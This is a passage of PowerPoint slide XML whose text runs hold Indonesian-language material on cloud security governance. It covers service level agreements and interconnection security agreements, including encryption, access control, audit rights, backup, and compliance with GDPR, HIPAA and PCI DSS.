              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komitmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sangatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegosiasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SLA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SLA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Interkoneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ISA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. ISA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemisahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Industri yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> GDPR, HIPAA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PCI DSS, dan ISA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, ISA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subkontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subkontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
